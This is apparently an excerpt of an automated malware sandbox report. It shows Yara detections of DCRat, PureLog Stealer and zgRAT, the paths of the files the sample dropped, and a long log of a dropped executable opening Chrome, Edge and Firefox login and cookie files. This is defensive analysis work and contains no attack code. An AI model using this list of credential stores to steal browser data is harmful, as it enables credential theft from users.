Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1766711980.00000000132C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SfbAu0ICZn.exe PID: 7096, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: SfbAu0ICZn.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SfbAu0ICZn.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1656792148.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\opHipgZM6eS.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\CbsTemp\ctfmon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: SfbAu0ICZn.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SfbAu0ICZn.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\opHipgZM6eS.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\CbsTemp\ctfmon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
